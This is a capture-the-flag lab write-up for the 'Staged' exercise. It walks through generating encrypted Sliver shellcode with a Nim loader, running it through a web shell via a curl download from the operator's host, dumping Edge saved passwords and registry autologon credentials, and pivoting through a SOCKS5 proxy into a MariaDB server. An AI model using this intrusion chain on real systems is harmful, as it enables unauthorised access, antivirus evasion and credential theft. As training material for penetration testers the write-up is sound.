Staged
Objective / Scope
You are a member of the Hack Smarter Red Team and have been assigned to perform a black-box penetration test against a client's critical infrastructure. The scope is strictly limited to the following hostnames:
web.hacksmarter: Public-facing Windows Web Server (Initial Access Point). Windows Defender is enabled. sqlsrv.hacksmarter: Internal Linux MySQL Database Server.
The exercise is considered complete upon successfully retrieval the final flag from sqlsrv.hacksmarter
Any activity outside of these two hosts or their associated network interfaces is strictly prohibited.
Lab Starting Point
During the beginning of the engagement, another operator exploited a file upload vulnerability, and they have provided you with a web shell.
http://web.hacksmarter/hacksmarter/shell.php?cmd=whoami
Sliver session as j.smith
Use sliver to generate shellcode
generate --mtls 10.200.24.149 --format shellcode --save raw.bin --os windows
Encrypt the shellcode
encrypt_shellcode raw.bin payload.bin 0x4A
[+] Encrypted raw.bin → payload.bin with key 0x4A
Build with nim
nim c -d:release --app:gui --opt:size --os:windows --cpu:amd64 \
--gcc.exe:x86_64-w64-mingw32-gcc \
--gcc.linkerexe:x86_64-w64-mingw32-gcc \
--passL:"-s -Wl,--strip-all" \
--stackTrace:off --lineTrace:off \
~/tools/shellcode_stuff/loader.nim
Host payload
python -m http.server
Since we started with a web shell, use the webshell to download and execute the payload to get a Sliver session.
http://web.hacksmarter/hacksmarter/shell.php?cmd=curl+http://10.200.24.149:8000/loader.exe+-o+c:\users\j.smith\loader.exe+%26+c:\users\j.smith\loader.exe
Sliver Session
[*] Session fc96f6f1 EXPENSIVE_OCEAN - 10.0.22.99:49785 (EC2AMAZ-IBNMCK4) - windows/amd64 -
sliver > use fc96f6f1-a723-490d-82a8-554a2ceb5dcd
[*] Active session EXPENSIVE_OCEAN (fc96f6f1-a723-490d-82a8-554a2ceb5dcd)
sliver (EXPENSIVE_OCEAN) > whoami
Logon ID: EC2AMAZ-IBNMCK4\j.smith
[*] Current Token ID: EC2AMAZ-IBNMCK4\j.smith
Find credentials
From the sliver session, we can enumerate and hunt for privilege escalation paths.
sharpchrome (find b.morgan cleartext password)
sliver (EXPENSIVE_OCEAN) > sharpchrome logins /browser:edge
[*] sharpchrome output:
__ _
(_ |_ _. ._ ._ / |_ ._ _ ._ _ _
__) | | (_| | |_) \_ | | | (_) | | | (/_
|
v1.12.0
[*] Action: Edge Saved Logins Triage
[*] Triaging Edge Logins for current user
[*] AES state key file : C:\Users\j.smith\AppData\Local\Microsoft\Edge\User Data\Local State
[*] AES state key : 932AA2396C91CCBE6589539D2B5AA18F95C9749B1CCBBD750B3DB51AA73366BE
--- Credential (Path: C:\Users\j.smith\AppData\Local\Microsoft\Edge\User Data\Default\Login Data) ---
file_path,signon_realm,origin_url,date_created,times_used,username,password
C:\Users\j.smith\AppData\Local\Microsoft\Edge\User Data\Default\Login Data,https://hacksmarter.org/,https://hacksmarter.org/,9/26/2025 3:39:38 PM,13403374778039617,b.morgan,O3KA6B#y1$15
We retrieved stored credentials from the Edge Browser.
b.morgan:O3KA6B#y1$15
sharpup (find p.richardson cleartext password)
sliver (EXPENSIVE_OCEAN) > sharpup audit
[*] sharpup output:
=== SharpUp: Running Privilege Escalation Checks ===
=== Registry AutoLogons ===
DefaultDomainName:
DefaultUserName: p.richardson
DefaultPassword: ^^CThacker66
AltDefaultDomainName:
AltDefaultUserName:
AltDefaultPassword:
=== Abusable Token Privileges ===
SeImpersonatePrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
=== Services with Unquoted Paths ===
Service 'NoteTakingSvc' (StartMode: Automatic) has executable 'C:\Program Files\Note Taking App\notes.exe', but 'C:\Program' is modifable.
=== Modifiable Service Binaries ===
Service 'Apache2.4' (State: Running, StartMode: Auto) : "C:\xampp\apache\bin\httpd.exe" -k runservice
In the Objective/Scope section, it stated sqlsrv.hacksmarter is an internal linux mysql database server. Setup socks5 proxy through sliver session and scan to see if mysql port 3306 is open
Move laterally to sqlsrv.hacksmarter
socks5 proxy
This can be achieved using the sliver session
sliver (EXPENSIVE_OCEAN) > socks5 start
[*] Started SOCKS5 127.0.0.1 1081
⚠ In-band SOCKS proxies can be a little unstable depending on protocol
Modify /etc/proxychains.conf to add socks5
[ProxyList]
socks5 127.0.0.1 1081
Scan for mysql port on sqlsrv.hacksmarter
proxychains -q nmap 10.0.22.69 -Pn -sT -p 3306
Starting Nmap 7.98 ( https://nmap.org ) at 2025-12-19 11:32 -0500
Nmap scan report for sqlsrv.hacksmarter (10.0.22.69)
Host is up (0.00s latency).
PORT STATE SERVICE
3306/tcp open mysql
Connect to mysql as p.richardson
proxychains -q mariadb -u p.richardson -h sqlsrv.hacksmarter -p --skip-ssl
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 40
Server version: 10.6.22-MariaDB-0ubuntu0.22.04.1 Ubuntu 22.04
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]>
Retrieve flag
Enumerate databases
MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| hacksmarter_db |
| information_schema |
+--------------------+
2 rows in set (0.051 sec)
MariaDB [(none)]> use hacksmarter_db
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
Enumerate tables in hacksmarter_db
MariaDB [hacksmarter_db]> show tables;
+--------------------------+
| Tables_in_hacksmarter_db |
+--------------------------+
| final_config |
+--------------------------+
1 row in set (0.053 sec)
MariaDB [hacksmarter_db]> select * from final_config;
+----+-----------------+----------------------------------------+
| id | key_name | key_value |
+----+-----------------+----------------------------------------+
| 1 | admin_api_token | FLAG{b64f49553d5c441652e95697a2c5949e} |
| 2 | system_status | Operational |
+----+-----------------+----------------------------------------+
2 rows in set (0.052 sec)
Submit the flag found in the database